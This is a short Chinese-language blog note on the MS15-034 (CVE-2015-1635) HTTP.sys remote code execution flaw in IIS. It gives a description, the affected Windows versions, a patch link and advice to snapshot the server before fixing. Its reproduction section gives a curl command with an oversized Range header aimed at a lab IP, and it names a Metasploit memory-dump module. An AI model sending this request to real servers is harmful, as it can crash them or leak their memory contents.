#每次命令都百度去找命令,直接弄到博客方便些;
漏洞描述:
在2015年4月安全補丁日,微軟發布的眾多安全更新中,修復了HTTP.sys中一處允許遠程執行代碼漏洞,編號為:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻擊者只需要發送惡意的http請求數據包,就可能遠程讀取IIS服務器的內存數據,或使服務器系統藍屏崩潰。根據公告顯示,該漏洞對服務器系統造成了不小的影響,主要影響了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在內的主流服務器操作系統。
修復建議:
微軟已發布補丁MS15-034,補丁下載地址:https://technet.microsoft.com/zh-CN/library/security/ms15-034.aspx 注:建議在修復前創建服務器快照,以免修復失敗造成損失。
Referee:https://www.cnblogs.com/peterpan0707007/p/8529261.html
復現過程:
curl http://192.168.40.65 -H "Host: 192.168.40.65" -H "Range: bytes=0-18446744073709551615"
MSF模塊
scanner/http/ms15_034_http_sys_memory_dump
